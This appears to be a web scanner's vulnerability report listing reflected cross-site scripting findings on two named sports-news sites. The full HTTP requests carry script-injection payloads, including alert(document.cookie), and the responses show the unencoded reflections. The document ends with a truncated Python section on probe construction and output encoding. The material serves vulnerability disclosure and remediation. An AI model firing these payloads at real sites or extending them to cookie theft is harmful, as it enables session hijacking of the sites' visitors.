GET /12/17/10/Urban-Renterias-comments-wrong-in-every-85ab2"><script>alert(1)</script>c66f7de0b0d/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=940f044b17dfcf494474c7a627998fb0; path=/
Expires: Sun, 19 Dec 2010 18:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Urban-Renterias-comments-wrong-in-every-85ab2"><script>alert(1)</script>c66f7de0b0d/landing_urban_v3.html">
...[SNIP]...

2.228. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ed7d"><script>alert(1)</script>67cb3a41014 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C7ed7d"><script>alert(1)</script>67cb3a41014/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C7ed7d"><script>alert(1)</script>67cb3a41014/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.229. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e51"><script>alert(1)</script>0d5c9babaf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae74051e51"><script>alert(1)</script>0d5c9babaf1/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae74051e51"><script>alert(1)</script>0d5c9babaf1/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.230. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c95"><script>alert(1)</script>31f08011031 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17e5c95"><script>alert(1)</script>31f08011031/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17e5c95"><script>alert(1)</script>31f08011031/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.231. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 358b2"><script>alert(1)</script>d0de32d96b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10358b2"><script>alert(1)</script>d0de32d96b3/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40295
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10358b2"><script>alert(1)</script>d0de32d96b3/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.232. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd16"><script>alert(1)</script>95264bab223 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-4fd16"><script>alert(1)</script>95264bab223/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-4fd16"><script>alert(1)</script>95264bab223/landing_urban_v3.html">
...[SNIP]...

2.233. http://www.csnbayarea.com/pages/landing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /pages/landing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf79"><script>alert(1)</script>0bab4ba8ccc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/landing?1cf79"><script>alert(1)</script>0bab4ba8ccc=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 51177
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="1cf79"><script>alert(1)</script>0bab4ba8ccc" id = "1cf79">
...[SNIP]...

2.234. http://www.csnbayarea.com/pages/profiles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /pages/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bae73"><script>alert(1)</script>36ec9c80c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/profiles?bae73"><script>alert(1)</script>36ec9c80c16=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 52908
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="bae73"><script>alert(1)</script>36ec9c80c16" id = "bae73">
...[SNIP]...

2.235. http://www.csnbayarea.com/pages/video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7398"><script>alert(1)</script>58cec5b7caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?f7398"><script>alert(1)</script>58cec5b7caa=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 76152
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="f7398"><script>alert(1)</script>58cec5b7caa" id = "f7398">
...[SNIP]...

2.236. http://www.csncalifornia.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13b5a"><script>alert(1)</script>20777afd731 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?13b5a"><script>alert(1)</script>20777afd731=1 HTTP/1.1
Host: www.csncalifornia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:01 GMT
Connection: close
Set-Cookie: PHPSESSID=7ec6ef4cff790030950ccceec1a36f22; path=/
Content-Length: 98170

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="13b5a"><script>alert(1)</script>20777afd731" id = "13b5a">
...[SNIP]...

2.237. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d407"><script>alert(1)</script>b63af54bf8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /111d407"><script>alert(1)</script>b63af54bf8e/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/111d407"><script>alert(1)</script>b63af54bf8e/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html">
...[SNIP]...

2.238. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce80c"><script>alert(1)</script>e0e2993fc81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22ce80c"><script>alert(1)</script>e0e2993fc81/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/11/22ce80c"><script>alert(1)</script>e0e2993fc81/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html">
...[SNIP]...

2.239. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef888"><script>alert(1)</script>c0087ef2dd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22/10ef888"><script>alert(1)</script>c0087ef2dd5/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/11/22/10ef888"><script>alert(1)</script>c0087ef2dd5/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html">
...[SNIP]...

2.240. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1d4"><script>alert(1)</script>e7c9caf2624 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE4c1d4"><script>alert(1)</script>e7c9caf2624/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE4c1d4"><script>alert(1)</script>e7c9caf2624/landing.html">
...[SNIP]...

2.241. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ead4d"><script>alert(1)</script>92c61a9dd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html?ead4d"><script>alert(1)</script>92c61a9dd4f=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51651

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="ead4d"><script>alert(1)</script>92c61a9dd4f" id = "ead4d">
...[SNIP]...
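Findings 2.237 through 2.241 above (and the csnbayarea.com findings before them) all describe the same two sinks on one page template: a request path segment echoed into the action attribute of the formInvisible form, and the name of any query parameter echoed into a hidden input's name attribute, both unencoded inside a double-quoted attribute. The Python below is an added example, not code from this report or from the site. It reproduces the scanner's probe construction and its reflection-context check offline against a constructed page that mimics the [SNIP] fragments (the site's real server code is not known; the vulnerable renderer here is an assumption), and shows the attribute-encoding fix that closes both sinks.

```python
"""Added example: reproduce the scanner's reflected-XSS probe/check and the fix.

Not the site's code. The two render functions are an assumed model of the page
template seen in the report's [SNIP] fragments; ARTICLE_PATH is taken from the
findings above.
"""
import html
import re
import secrets

ARTICLE_PATH = "/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html"


def make_canary() -> str:
    """Probe of the shape the scanner used: hex prefix, '">' to close the
    attribute and tag, a script element, hex suffix to locate the reflection."""
    return f'{secrets.token_hex(3)[:5]}"><script>alert(1)</script>{secrets.token_hex(6)[:11]}'


def inject_path_segment(path: str, index: int, canary: str) -> str:
    """Append the canary to 1-based path segment `index` (the report's 'REST URL parameter N')."""
    segments = path.strip("/").split("/")
    segments[index - 1] += canary
    return "/" + "/".join(segments)


def inject_param_name(path: str, canary: str) -> str:
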